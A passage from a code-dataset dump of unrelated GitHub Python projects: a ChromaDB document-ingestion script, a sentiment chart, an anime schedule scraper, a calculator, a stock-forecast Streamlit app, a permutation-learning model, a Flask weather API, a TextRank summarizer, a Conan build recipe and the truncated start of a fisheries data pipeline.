 #\".pdf\": (PDFMinerLoader, {}), \n \".pdf\": (customPdfLoader, {}), \n \".ppt\": (UnstructuredPowerPointLoader, {}),\n \".pptx\": (UnstructuredPowerPointLoader, {}),\n \".txt\": (TextLoader, {\"encoding\": \"utf8\"}),\n # Add more mappings for other file extensions and loaders as needed\n}\n\n\ndef load_single_document(file_path: str) -> Document:\n ext = \".\" + file_path.rsplit(\".\", 1)[-1]\n if ext in LOADER_MAPPING:\n loader_class, loader_args = LOADER_MAPPING[ext]\n loader = loader_class(file_path, **loader_args)\n return loader.load()[0]\n\n raise ValueError(f\"Unsupported file extension '{ext}'\")\n\n\ndef load_documents(source_dir: str, ignored_files: List[str] = []) -> List[Document]:\n \"\"\"\n Loads all documents from the source documents directory, ignoring specified files\n \"\"\"\n all_files = []\n for ext in LOADER_MAPPING:\n all_files.extend(\n glob.glob(os.path.join(source_dir, f\"**/*{ext}\"), recursive=True)\n )\n filtered_files = [file_path for file_path in all_files if file_path not in ignored_files]\n\n with Pool(processes=os.cpu_count()) as pool:\n results = []\n with tqdm(total=len(filtered_files), desc='Loading new documents', ncols=80) as pbar:\n for i, doc in enumerate(pool.imap_unordered(load_single_document, filtered_files)):\n results.append(doc)\n pbar.update()\n\n return results\n\ndef process_documents(collection: Collection, ignored_files: List[str] = []) -> List[Document]:\n \"\"\"\n Build a Document from each file whose content has been loaded.\n Clean the content taken from the files so the AI DB footprint stays small -- lines that contain no text are not stored.\n \n 1. Split the text into pieces using the pattern \"\\ n|\\ n\\ n|\\ r\\ n\"\n 2. Trim surrounding whitespace, and append \"\\ n\" to sentences ending with . to get \".\\ n\" as a mark point telling the LLM to stop generating the answer\n 3. Take the content from step 2, build documents, and store them in ChromaDB (AI DB)\n \"\"\"\n print(f\"Loading documents from {source_directory}\")\n documents = load_documents(source_directory, ignored_files)\n if not documents:\n print(\"No new documents to load\")\n exit(0)\n print(f\"Loaded {len(documents)} new documents from {source_directory}\")\n\n\n text_splitter = RecursiveCharacterTextSplitter(chunk_size=chunk_size, chunk_overlap=chunk_overlap)\n\n # Build a Document from each file whose content has been loaded.\n # Clean the content taken from the files so the AI DB footprint stays small -- lines that contain no text are not stored.\n #\n # 1. Split the text into pieces using the pattern \\n|\\n\\n|\\r\\n\n # 2. Trim surrounding whitespace, and append \\n to sentences ending with . to get .\\n as a mark point telling the LLM to stop generating the answer\n # 3. Take the content from step 2, build documents, and store them in ChromaDB (AI DB)\n
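 # For instance (illustrative values only): re.split(pattern=\"\\n{1,}|\\r\\n\", string=\"a\\n\\n b \\nc\") yields ['a', ' b ', 'c'],\n # and the strip/filter pass below turns that into ['a', 'b', 'c'].\n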
 ret_new_document = []\n for doc in documents:\n split_texts = re.split(pattern=\"\\n{1,}|\\r\\n\", string=doc.page_content)\n split_texts = [re.sub('\\s{2,}', ' ', text.strip()) for text in split_texts if len(text.strip()) > 0]\n split_texts = [f'{text}\\n' if text.endswith('.') else text for text in split_texts] # Mark point so the LLM knows the end-of-sequence/stop-sequence/stop-generating point (the end of the sentence)\n cleaned_texts = ' '.join(split_texts)\n\n # Split the text into individual chunks (piece by piece)\n # .split_text drops the \\n if it happens to be the last token of a chunk\n chunks = text_splitter.split_text(text=cleaned_texts)\n chunks = [f'{chunk}\\n' if chunk.endswith('.') else chunk for chunk in chunks] # Mark point End-Of-Sequence/Stop Sequence/Stop Generate Text for the LLM\n id_count = 1\n for chunk in chunks:\n new_idx = f'idx_{id_count}'\n id_count += 1\n\n # Handle special characters so the LLM does not fail while generating answers, e.g.\n # Feature: Deposit cash balance Conditions: Users can’t deposit\n # when it hits ’ the LLM sometimes raises an Exception while generating the answer\n # ** Disabled for now: no way yet to decode the encoded text back to the original\n chunk_transform_special_character = chunk #transform_special_character_to_encoded(chunk)\n\n # Store each chunk in the AI DB\n collection.add(\n ids = [f\"{doc.metadata['source']}-{new_idx}\"],\n documents=[chunk_transform_special_character],\n metadatas=[{AI_DB_METADATA_INTERNAL_IDX_NAME: new_idx, AI_DB_METADATA_DOCUMENT_SOURCE_NAME: doc.metadata['source']}]\n )\n ret_new_document.append(chunk_transform_special_character)\n\n return ret_new_document\n\n # text_splitter = RecursiveCharacterTextSplitter(chunk_size=chunk_size, chunk_overlap=chunk_overlap)\n # split_documents = text_splitter.split_documents(documents)\n # print(f\"Split into {len(split_documents)} chunks of text (max. {chunk_size} tokens each)\")\n # return split_documents\n\ndef does_vectorstore_exist(persist_directory: str) -> bool:\n \"\"\"\n Checks if vectorstore exists\n \"\"\"\n if os.path.exists(os.path.join(persist_directory, 'index')):\n if os.path.exists(os.path.join(persist_directory, 'chroma-collections.parquet')) and os.path.exists(os.path.join(persist_directory, 'chroma-embeddings.parquet')):\n list_index_files = glob.glob(os.path.join(persist_directory, 'index/*.bin'))\n list_index_files += glob.glob(os.path.join(persist_directory, 'index/*.pkl'))\n # At least 3 documents are needed in a working vectorstore\n if len(list_index_files) > 3:\n return True\n return False\n
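# Usage sketch (hypothetical path): does_vectorstore_exist('db') returns True only once both\n# chroma parquet files and more than 3 index files are present, guarding against a half-written store.\n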
\ndef main():\n # Create embeddings\n #embeddings = EMBEDDING_INSTANCE #HuggingFaceEmbeddings(model_name=embeddings_model_name)\n #embeddings = HuggingFaceEmbeddings()\n\n # if does_vectorstore_exist(persist_directory):\n # # Update and store locally vectorstore\n # print(f\"Appending to existing vectorstore at {persist_directory}\")\n # db = Chroma(persist_directory=persist_directory, embedding_function=embeddings, client_settings=CHROMA_SETTINGS)\n # collection = db.get()\n # texts = process_documents([metadata['source'] for metadata in collection['metadatas']])\n # print(f\"Creating embeddings. May take some minutes...\")\n # db.add_documents(texts)\n # else:\n # # Create and store locally vectorstore\n # print(\"Creating new vectorstore\")\n # texts = process_documents()\n # print(f\"Creating embeddings. May take some minutes...\")\n # db = Chroma.from_documents(texts, embeddings, persist_directory=persist_directory, client_settings=CHROMA_SETTINGS)\n\n db = load_chroma_database()\n collection = None if get_default_ai_db_collection_name() not in [coll.name for coll in db.list_collections()] else db.get_collection(name=get_default_ai_db_collection_name(), embedding_function=get_default_embedding())\n if collection == None:\n # Create a new vectorstore\n # create_collection also takes an optional metadata argument which can be used to customize the distance \n # method of the embedding space by setting the value of hnsw:space. \n # Valid options for hnsw:space are \"l2\", \"ip\", or \"cosine\"\n print('Creating new vectorstore ...')\n collection = db.create_collection(\n name=get_default_ai_db_collection_name(),\n embedding_function=get_default_embedding(),\n metadata={\"hnsw:space\": \"cosine\"}\n )\n else:\n print(\"Finding documents that aren't in the vectorstore yet; they will be added ...\")\n\n # Fetch every document stored in the collection\n # so the metadatas can be checked to see which files have already been stored\n documents = collection.get()\n process_documents(collection, [metadata['source'] for metadata in documents[\"metadatas\"]])\n db.persist()\n db = None\n\n print(f\"Ingestion complete! You can now run runner.py to query your documents\")\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"chairod/LLM-GPT4All","sub_path":"ingre.py","file_name":"ingre.py","file_ext":"py","file_size_in_byte":13345,"program_lang":"python","lang":"th","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"3826478472","text":"from bokeh.plotting import figure\n\ndef getLocations(df_tws):\n\t# count sentiments from each tweet\n\ttw_pos = sum(df_tws['sentiment'] == 1)\n\ttw_neu = sum(df_tws['sentiment'] == 0)\n\ttw_neg = sum(df_tws['sentiment'] == -1)\n\n\t# plot results\n\tgroup = ['Negative', 'Neutral', 'Positive']\n\tcounts = [tw_neg, tw_neu, tw_pos]\n\tp = figure(plot_height=400, x_range=group, title='Sentiment Analysis', toolbar_location=None, tools='')\n\tp.vbar(x=group, top=counts, width=0.8) # , source=source)\n\tp.y_range.start = 0\n\tp.xgrid.grid_line_color = None\n\tp.xaxis.axis_label = 'Hashtags'\n\tp.xaxis.major_label_orientation = 1.2\n\tp.outline_line_color = None\n\treturn p","repo_name":"timmo-d/MyApps","sub_path":"sentiment/src/analysis_geo.py","file_name":"analysis_geo.py","file_ext":"py","file_size_in_byte":643,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"4931003372","text":"from bs4 import BeautifulSoup\nfrom PIL import Image\nimport requests\nfrom io import BytesIO\nimport json\n\nSCRAPED_SITE = 'https://subsplease.org'\nMEDIA_FOLDER = 'media/'\nSHOWS_FOLDER = '/shows/'\nJSON_URL = 'https://subsplease.org/api/?f=schedule&tz=Europe/Moscow'\n\ndef get_image(url, save_filename):\n rimg = requests.get(SCRAPED_SITE + url)\n img = Image.open(BytesIO(rimg.content))\n img.save(MEDIA_FOLDER+save_filename+'.jpg')\n return save_filename+'.jpg'\n\ndef get_full_url(page):\n return SCRAPED_SITE + SHOWS_FOLDER + page\n\ndef get_synopsis(page):\n syn = ''\n r = requests.get(get_full_url(page))\n soup = BeautifulSoup(r.text, \"html.parser\")\n syn_list = soup.body.find_all('div', class_=\"series-syn\")[0].find_all('p')\n\n for p in syn_list:\n syn += p.get_text() + '\\n'\n\n return syn.strip()\n\ndef get_schedule():\n animes = json.loads(requests.get(JSON_URL).text)\n\n anime_dictionary = {}\n\n days_list = ['Monday', 'Tuesday', 'Wednesday',\n 'Thursday', 'Friday', 'Saturday', 'Sunday']\n
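 # Each schedule entry is assumed (from the accesses below) to carry 'title', 'time', 'page' and 'image_url' fields.\n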
\n    for day in days_list:\n        anime_day = animes['schedule'][day]\n        anime_dictionary[day] = []\n        for i in range(len(anime_day)):\n            show = anime_day[i]\n            anime_dictionary[day].append({\n                'title': show['title'],\n                'time': show['time'],\n                'synopsis': get_synopsis(show['page']),\n                'image': get_image(show['image_url'], show['page']),\n                'url' : get_full_url(show['page'])})\n\n\n    with open('anime.json', 'w', encoding='utf-8') as f:\n        json.dump(anime_dictionary, f, ensure_ascii=False, indent=4)\n\n\nif __name__ == '__main__':\n    get_schedule()","repo_name":"pevepeve/catbot","sub_path":"fetch_subsplease.py","file_name":"fetch_subsplease.py","file_ext":"py","file_size_in_byte":1691,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"27536547486","text":"\"\"\"\nBasic Calculator II\n\nGiven a string s which represents an expression, evaluate this expression and return its value. \n\nThe integer division should truncate toward zero.\n\nYou may assume that the given expression is always valid. All intermediate results will be in the range of [-2^31, 2^31 - 1].\n\nNote: You are not allowed to use any built-in function which evaluates strings as mathematical expressions, such as eval().\n\nInput: s = \"3+2*2\"\nOutput: 7\n\nInput: s = \" 3/2 \"\nOutput: 1\n\nInput: s = \" 3+5 / 2 \"\nOutput: 5\n\ns = \"3+2*2\"\nstack = [3,2]\npositive = True\nnum = ''\nval = 2\n\"\"\"\n\ndef calc(s: str) -> int:\n    num = ''\n    stack = []\n    op = '+'\n    for ch in s:\n        if ch == ' ': continue\n        if ch.isdigit():\n            num += ch\n        else:\n            if op == '+':\n                stack.append(int(num))\n            elif op == '-':\n                stack.append(-1*int(num))\n            elif op == '*':\n                last = stack.pop()\n                stack.append(last*int(num))\n            elif op == '/':\n                last = stack.pop()\n                stack.append(int(last / int(num))) # truncate toward zero; floor division would round negative quotients the wrong way\n            num = ''\n            op = ch\n    if num:\n        if op == '+':\n            stack.append(int(num))\n        elif op == '-':\n            stack.append(-1*int(num))\n        elif op == '*':\n            last = stack.pop()\n            stack.append(last*int(num))\n        elif op == '/':\n            last = stack.pop()\n            stack.append(int(last / int(num))) # truncate toward zero\n    return sum(stack)\n\nprint(calc('3+2*2/1'))\nprint(calc('3+2*2/5'))\n","repo_name":"manavdahra/interview-prep","sub_path":"basic_calc_2.py","file_name":"basic_calc_2.py","file_ext":"py","file_size_in_byte":1545,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"8559810611","text":"import streamlit as st\nimport pandas as pd\nimport numpy as np\nfrom functions import gbm, prev_graph, hist\nfrom pytickersymbols import PyTickerSymbols\n\nst.set_page_config(page_title = \"Stock Forecasting\", layout = \"wide\")\n\nstock_data = PyTickerSymbols()\nus_stocks = stock_data.get_stocks_by_index(\"S&P 500\")\ndf = pd.DataFrame.from_dict(list(us_stocks), orient='columns')\ntickers = df[\"symbol\"]\n\nwith st.container(): \n\tst.title(\"📈 Stock Price Forecasting\")\n\tst.write(\"Forecasting future stock prices with geometric brownian motion modeled by a random walk\")\n#st.markdown(\"App made by Diogo Pedrosa and Tiago Gonçalves for *Simulação e Processos Estocásticos* subject from Faculdade de Ciências da Universidade do Porto\")\nst.markdown(\"**This app is not meant to give financial advice nor are we credited to do so**\")\nst.write(\"---\")\n\ncol1, col2, col3 = st.columns(3)\n\nticker = col1.selectbox(\"Select a stock\", tickers)\nprev_data = col2.selectbox(\"Select the length of training data\", [\"6 Months\", \"1 Year\", \"3 Years\", \"5 Years\"])
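# Under geometric Brownian motion (a standard result, not specific to this repo): S_t = S_0 * exp((mu - sigma**2/2)*t + sigma*W_t);\n# gbm() from functions.py presumably calibrates mu and sigma on the window chosen above and simulates the requested number of paths.\n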
\"5 Years\"])\nruns = col3.selectbox(\"Select the number of simulations\", [1000, 2500, 5000])\n\nst.write(\"---\")\n\ndf = gbm(ticker, prev_data, runs)\n\ncol1, col2 = st.columns(2)\n\ncol1.pyplot(prev_graph(df, ticker, runs), use_container_width = True)\ncol2.pyplot(hist(df, ticker), use_container_width = True)\n\n\n","repo_name":"tiago-trigo/Geometric-Brownian-Motion","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1324,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"21441166063","text":"\"\"\"Implements a structured fully connected layer.\"\"\"\nimport numpy as np\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nfrom struct_discovery.layers.struct_base_layer import StructBaseLayer\n\n\n# Gumbel sinkhorn support from https://github.com/perrying/gumbel-sinkhorn/blob/master/utils/gumbel_sinkhorn_ops.py\ndef log_sinkhorn_norm(log_alpha: torch.Tensor, n_iter: int = 20) -> (torch.Tensor,):\n for _ in range(n_iter):\n log_alpha = log_alpha - torch.logsumexp(log_alpha, -1, keepdim=True)\n log_alpha = log_alpha - torch.logsumexp(log_alpha, -2, keepdim=True)\n return log_alpha.exp()\n\n\ndef gumbel_sinkhorn(log_alpha: torch.Tensor, tau: float = 1.0, n_iter: int = 20, noise: bool = True) -> (torch.Tensor,):\n if noise:\n uniform_noise = torch.rand_like(log_alpha)\n gumbel_noise = -torch.log(-torch.log(uniform_noise+1e-20)+1e-20)\n log_alpha = (log_alpha + gumbel_noise)/tau\n sampled_perm_mat = log_sinkhorn_norm(log_alpha, n_iter)\n return sampled_perm_mat\n\n\nclass AugerinoModel(StructBaseLayer):\n def __init__(self, emb_dim=500, max_length=10, h_dim=50, sample_size=1, data_mean=0, data_std=1):\n super(AugerinoModel, self).__init__()\n self.emb_dim = emb_dim\n self.max_length = max_length\n self.h_dim = h_dim\n self.sample_size = sample_size\n\n self.data_mean = data_mean\n self.data_std = data_std\n\n # Embedding layer.\n self.emb = nn.Embedding(11, emb_dim, padding_idx=0)\n\n # Output layer.\n self.out = torch.nn.Linear(h_dim, 1)\n # Register their parameters.\n for num, pp in enumerate(list(self.emb.parameters())):\n self.register_model_parameters('emb_%s' % num, pp)\n for num, pp in enumerate(list(self.out.parameters())):\n self.register_model_parameters('out_%s' % num, pp)\n\n # One fully connected layer for each max_length.\n self.weights = nn.Parameter(torch.Tensor(\n max_length, self.h_dim, self.emb_dim))\n self.bias = nn.Parameter(torch.Tensor(max_length, self.h_dim))\n self.register_model_parameters('weights', self.weights)\n self.register_model_parameters('bias', self.bias)\n\n # Structured Linear layer\n self.structure = nn.Parameter(torch.Tensor(max_length, max_length))\n self.register_hyper_parameters('structure', self.structure)\n\n # Augerino Augmentation param.\n self.permute = nn.Parameter(torch.Tensor(max_length, max_length))\n self.register_model_parameters('permute', self.structure)\n\n self.reset_parameters()\n\n # Hard code sharing to identity.\n with torch.no_grad():\n A_init = np.eye(max_length)\n A_init_scale = 10.\n AA = A_init_scale * \\\n torch.from_numpy(A_init).float()-(A_init_scale/2.)\n self.structure.copy_(AA)\n self.entropy_weight = 1\n self.tau = 0.1\n\n def reset_model_parameters(self):\n nn.init.xavier_uniform_(self.weights)\n nn.init.uniform_(self.bias, -0.1, 0.1)\n\n def reset_parameters(self):\n nn.init.xavier_uniform_(self.weights)\n nn.init.uniform_(self.bias, -0.1, 0.1)\n nn.init.uniform_(self.structure, -0.1, 0.1)\n 
nn.init.uniform_(self.permute, -0.1, 0.1)\n\n def forward_A(self):\n return torch.exp(nn.functional.log_softmax(self.structure, 1))\n\n def forward(self, x):\n feat = self.emb(x) # [Batch, max_len, emb_dim]\n # Apply Transformation Here.\n all_copy = []\n for k in range(self.sample_size+1):\n gs_mat = gumbel_sinkhorn(\n torch.cat([self.permute.unsqueeze(0)]*x.shape[0]), tau=self.tau)\n feat = torch.matmul(gs_mat, feat)\n # Structured fully connected layer.\n A = self.forward_A()\n # A on weights is the same as A on activation for mm.\n ww, bb = self.weights, self.bias\n d1, d2, d3 = ww.shape\n # Add sharing.\n ww = A.matmul(ww.reshape(d1, d2*d3))\n ww = ww.reshape(d1, d2, d3)\n bb = A.matmul(bb)\n # Run inference.\n h = []\n for k in range(self.max_length):\n h.append(F.linear(feat[:, k], ww[k], bb[k]))\n hh = torch.stack(h, 1)\n hh = F.relu(hh)\n # Pooling.\n hh = torch.sum(hh, 1)\n # Output layer.\n y_hat = self.out(hh)\n all_copy.append(y_hat.unsqueeze(0))\n # [Batch, 1]\n y_hat = torch.cat(all_copy, 0).mean(0)\n return y_hat\n\n def predict(self, x):\n y_hat = self.forward(x)\n return y_hat*self.data_std+self.data_mean\n\n def total_loss(self, input, target):\n return torch.mean(torch.abs(input.squeeze()-(target.squeeze()-self.data_mean)/self.data_std))\n\n def total_val_loss(self, input, target):\n \"\"\"Total + reg on A.\"\"\"\n loss_reg = 0\n AA = self.forward_A()\n loss_reg += torch.trace(torch.sqrt(AA.T.mm(AA)))/AA.shape[0]\n loss_reg += -self.entropy_weight * \\\n torch.sum(torch.log(AA+1e-6)*(AA+1e-6), -1).mean()*0.5\n return self.total_loss(input, target) + 0.05*loss_reg\n","repo_name":"raymondyeh07/equivariance_discovery","sub_path":"projects/PermutationSharing/permutation_sharing/model/augerino_model.py","file_name":"augerino_model.py","file_ext":"py","file_size_in_byte":5222,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"76"} +{"seq_id":"30293603807","text":"# Dependencies\nimport datetime as dt\nimport pandas as pd\nimport numpy as np\nimport sqlalchemy\nfrom sqlalchemy.ext.automap import automap_base\nfrom sqlalchemy.orm import Session\nfrom sqlalchemy import create_engine, func, inspect\nfrom flask import Flask, jsonify\n\n# set up database engine\n# connect_args needed because Python is a single thread application\n## the other option is to open session = Session(engine) within each function\nengine = create_engine(\"sqlite:///../Resources/hawaii.sqlite\", connect_args={'check_same_thread': False})\ninspector = inspect(engine)\n\n# Reflect database into our classes\nBase = automap_base()\nBase.prepare(engine, reflect=True)\n\n# Save references to each table\nMeasurement = Base.classes.measurement\nStation = Base.classes.station\n\n# Create our session (link) from Python to the DB\nsession = Session(engine)\n\n# Create a new flask app 'instance'\napp = Flask(__name__)\n\n# define 'starting point' a.k.a the 'root'\n@app.route('/') ## the '/' denotes that we want to put our data at the root of our routes\n# create a function that i want in this specific route\ndef welcome():\n return (\"\"\"\n Welcome to the Climate Analysis API!
\n    Available Routes:\n    /api/v1.0/precipitation\n    /api/v1.0/stations\n    /api/v1.0/tobs\n    /api/v1.0/temp\n    \"\"\")\n\n@app.route('/api/v1.0/precipitation')\ndef precipitation():\n\n    prev_year = dt.date(2017,8,23) - dt.timedelta(days=365)\n    precipitation = session.query(Measurement.date, Measurement.prcp).filter(Measurement.date >= prev_year).all()\n    precip = {date: prcp for date, prcp in precipitation}\n    return jsonify(precip)\n\n\n@app.route('/api/v1.0/stations')\ndef stations():\n\n    results = session.query(Station.station).all()\n    stations = list(np.ravel(results)) # unravel results into a one-dimensional array and convert the array to a list\n    return jsonify(stations=stations)\n\n@app.route('/api/v1.0/tobs')\ndef temps_monthly():\n    prev_year = dt.date(2017,8,23) - dt.timedelta(days=365)\n    results = session.query(Measurement.tobs).\\\n        filter(Measurement.station == 'USC00519281').filter(Measurement.date >= prev_year).all()\n    temps = list(np.ravel(results))\n    return jsonify(temps=temps)\n\n@app.route(\"/api/v1.0/temp/<start>\")\n@app.route(\"/api/v1.0/temp/<start>/<end>\")\ndef stats(start=None, end=None):\n    sel = [func.min(Measurement.tobs), func.avg(Measurement.tobs), func.max(Measurement.tobs)]\n\n    if not end:\n        results = session.query(*sel).\\\n            filter(Measurement.date >= start).all()\n        temps = list(np.ravel(results))\n        return jsonify(temps=temps)\n    \n    results = session.query(*sel).\\\n        filter(Measurement.date >= start).\\\n        filter(Measurement.date <= end).all()\n    temps = list(np.ravel(results))\n    return jsonify(temps)\n\nif __name__ == '__main__':\n    app.run(debug=True)","repo_name":"JustGitCoding/Surfing_Weather_Analysis","sub_path":"workingfiles/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2987,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"38537773172","text":"import config\n\ndef summarize(textGraph):\n\tgraph = textGraph.graph\n\tnumberOfVertices = textGraph.numberOfVertices\n\n\trankedGraph, vertexScores = rank(graph, numberOfVertices)\n\n\tsummarySize = int(numberOfVertices / config.TEXT_TO_SUMMARY_RATIO)\n\n\tvertexScores.sort(reverse = True)\n\tminScore = vertexScores[summarySize]\n\n\tsummary = \"\"\n\n\tfor vertex, attribute in graph.items():\n\t\tif (attribute[0] >= minScore):\n\t\t\tsummary += str(attribute[1])\n\t\t\tif len(summary.split(\" \")) > config.MAX_WORDS:\n\t\t\t\tbreak\n\n\treturn summary\n\ndef rank(graph, numberOfVertices):\n\n\tverticesAboveThreshold = []\n\tvertexScores = []\n\titeration = 0\n\n\twhile(True):\n\t\titeration += 1\n\t\tfor vertex, attribute in graph.items():\n\t\t\tvertexStrength = 0\n\t\t\toldScore = attribute[0]\n\n\t\t\tfor neighbour in attribute[2]:\n\t\t\t\tvertexStrength += getNeighbourStrength(neighbour[0], neighbour[1], graph)\n\n\t\t\tnewScore = (1 - config.DAMPING_FACTOR) + (config.DAMPING_FACTOR * vertexStrength)\n\n\t\t\tif abs(newScore - oldScore) <= config.THRESHOLD:\n\t\t\t\tif vertex not in verticesAboveThreshold:\n\t\t\t\t\tverticesAboveThreshold.append(vertex)\n\t\t\t\t\tvertexScores.append(oldScore)\n\n\t\t\telse:\n\t\t\t\tattribute[0] = newScore\n\n\t\tif (len(verticesAboveThreshold) == numberOfVertices) or (iteration == 100):\n\t\t\tbreak\n\n\treturn (graph, vertexScores)\n\n\t\n\n\ndef getNeighbourStrength(neighbour, cxnWeight, graph):\n\tneighbourScore = graph[neighbour][0]\n\n\tneighbourStrength = 0\n\tfor cxn in graph[neighbour][2]:\n\t\tneighbourStrength += cxn[1]\n\n\treturn neighbourScore * cxnWeight / 
neighbourStrength\n\n\n\n\n\n","repo_name":"aparkala/textRankSummarizer","sub_path":"algorithms/textRank.py","file_name":"textRank.py","file_ext":"py","file_size_in_byte":1516,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"18821654962","text":"import os\nfrom conans import ConanFile, MSBuild, VisualStudioBuildEnvironment, tools\nfrom conans.util.files import tmp_file\n\ncomponentName = \"SevenZip\"\n\nclass CoreConan(ConanFile):\n name = componentName\n# version = \"1.0\"\n license = \"\"\n url = \"\"\n description = \"\"\n settings = \"os\", \"compiler\", \"build_type\", \"arch\"\n options = {\"shared\": [True, False]}\n default_options = \"shared=False\"\n generators = \"visual_studio_multi\"\n\n scm = {\n \"type\": \"git\",\n \"url\": \"auto\",\n \"revision\": \"auto\"\n }\n \n def build(self):\n os.chdir(\"depends/7z1701-src/CPP/7zip/Bundles/StaticLib\");\n\n makeHeader = \"\"\n\n if self.options.shared == \"False\":\n makeHeader += \"STATIC_LIB=1\\n\"\n makeHeader += \"NO_DEFAULT_RES=1\\n\"\n \n if self.settings.compiler.runtime == \"MD\" or self.settings.compiler.runtime == \"MDd\":\n makeHeader += \"MY_SINGLE_THREAD=1\\n\"\n \n if self.settings.build_type == \"Debug\":\n makeHeader += \"MY_DEBUG=1\\n\"\n \n makeHeader += '!include \"makefile.base\"\\n'\n\n tools.save(\"makefile.conan\", makeHeader)\n \n if self.settings.os == \"Windows\":\n vcvars = tools.vcvars_command(self.settings)\n build_command = \"\"\n print(\"{0} && nmake -f makefile.conan\".format(vcvars))\n self.run(\"{0} && nmake -f makefile.conan\".format(vcvars))\n \n os.chdir(\"../../../../../..\")\n os.chdir('SevenZip++')\n \n libMachine = {\n \"x86\" : \"MachineX86\"\n ,'x86_64' : 'MachineX64'\n }.get(self.settings.get_safe(\"arch\"), \"\")\n \n libMachine_node = \"\" \\\n \"{}\" \\\n \"\".format(libMachine) if libMachine else \"\"\n \n runtime_library = {\"MT\": \"MultiThreaded\",\n \"MTd\": \"MultiThreadedDebug\",\n \"MD\": \"MultiThreadedDLL\",\n \"MDd\": \"MultiThreadedDebugDLL\"}.get(self.settings.get_safe(\"compiler.runtime\"), \"\")\n\n runtime_node = \"\" \\\n \"{}\" \\\n \"\".format(runtime_library) if runtime_library else \"\"\n\n props_file_contents = \"\"\"\n\n \n {0}\n \n {1}\n \n \n \n\"\"\".format(libMachine_node, runtime_node)\n with tmp_file(props_file_contents) as props_file_path:\n msbuild = MSBuild(self)\n msbuild.build(\n \"SevenZip++.vcxproj\"\n , toolset = self.settings.compiler.toolset\n , platforms={ \n \"x86\" : \"Win32\"\n ,'x86_64' : 'x64'\n }\n , properties = {\n \"ForceImportBeforeCppTargets\" : props_file_path\n }\n )\n\n def package(self):\n self.copy(\"*.h\", dst=\"include/SevenZip\", src=\"SevenZip++\")\n self.copy(\"SevenZip++*.lib\", dst=\"lib\", keep_path=False)\n self.copy(\"SevenZip++*.dll\", dst=\"bin\", keep_path=False)\n self.copy(\"SevenZip++*.dylib*\", dst=\"lib\", keep_path=False)\n self.copy(\"SevenZip++*.so\", dst=\"lib\", keep_path=False)\n self.copy(\"SevenZip++*.a\", dst=\"lib\", keep_path=False)\n\n def package_info(self):\n name = \"SevenZip\"\n \n if self.settings.build_type == \"Debug\":\n name += \"d\"\n\n name += \".lib\"\n self.cpp_info.libs = [name] # The libs to link against\n \n \n self.cpp_info.includedirs = ['include'] # Ordered list of include paths\n self.cpp_info.libdirs = ['lib'] # Directories where libraries can be found\n self.cpp_info.resdirs = ['res'] # Directories where resources, data, etc can be found\n self.cpp_info.bindirs = ['bin'] # Directories where executables and shared libs 
can be found\n self.cpp_info.defines = [] # preprocessor definitions\n self.cpp_info.cflags = [] # pure C flags\n self.cpp_info.cppflags = [] # C++ compilation flags\n self.cpp_info.sharedlinkflags = [] # linker flags\n self.cpp_info.exelinkflags = [] # linker flags\n \n # if self.options.shared == \"False\":\n # self.cpp_info.defines.append(\"{0}_STATIC_LIB\".format(componentName.upper()))\n\n ","repo_name":"ProtocolONE/cord.seven-zip","sub_path":"conanfile.py","file_name":"conanfile.py","file_ext":"py","file_size_in_byte":4527,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"76"} +{"seq_id":"70733802805","text":"from datetime import datetime\nfrom pathlib import Path\nfrom typing import Tuple\n\nimport pandas as pd\nimport prefect\nfrom prefect import Flow, Parameter, case, task\nfrom prefect.executors import LocalDaskExecutor\nfrom prefect.tasks.control_flow import merge\n\nfrom config import CURRENT_POSITION_ESTIMATION_MAX_HOURS, default_risk_factors\nfrom src.pipeline.generic_tasks import extract, load\nfrom src.pipeline.helpers.spatial import estimate_current_position\nfrom src.pipeline.processing import (\n coalesce,\n drop_duplicates_by_decreasing_priority,\n join_on_multiple_keys,\n left_isin_right_by_decreasing_priority,\n)\nfrom src.pipeline.shared_tasks.control_flow import check_flow_not_running\nfrom src.pipeline.shared_tasks.healthcheck import (\n assert_positions_received_by_api_health,\n get_monitorfish_healthcheck,\n)\nfrom src.pipeline.shared_tasks.infrastructure import get_table\nfrom src.pipeline.shared_tasks.positions import (\n add_vessel_identifier,\n tag_positions_at_port,\n)\nfrom src.pipeline.shared_tasks.vessels import add_vessel_id\n\n\n@task(checkpoint=False)\ndef validate_action(action: str) -> str:\n \"\"\"\n Checks that the received parameter value is valid and returns it. 
Raises ValueError\n    otherwise.\n\n    Args:\n        action (str): input parameter for the flow\n\n    Returns:\n        str: input, if valid\n\n    Raises:\n        ValueError: if input is not valid\n    \"\"\"\n\n    valid_actions = {\"update\", \"replace\"}\n\n    if action in valid_actions:\n        return action\n    else:\n        raise ValueError(\n            f\"action must be one of {', '.join(valid_actions)}, got {action}\"\n        )\n\n\n@task(checkpoint=False)\ndef extract_last_positions(minutes: int) -> pd.DataFrame:\n    \"\"\"\n    Extracts the last position of each vessel over the past `minutes` minutes.\n\n    Args:\n        minutes (int): number of minutes from current datetime to extract\n\n    Returns:\n        pd.DataFrame: DataFrame of vessels' last position.\n    \"\"\"\n    return extract(\n        db_name=\"monitorfish_remote\",\n        query_filepath=\"monitorfish/compute_last_positions.sql\",\n        params={\"minutes\": minutes},\n        dtypes={\"last_position_datetime_utc\": \"datetime64[ns]\"},\n    )\n\n\n@task(checkpoint=False)\ndef extract_pending_alerts() -> pd.DataFrame:\n    return extract(\n        db_name=\"monitorfish_remote\",\n        query_filepath=\"monitorfish/pending_alerts.sql\",\n    )\n\n\n@task(checkpoint=False)\ndef extract_reportings() -> pd.DataFrame:\n    return extract(\n        db_name=\"monitorfish_remote\",\n        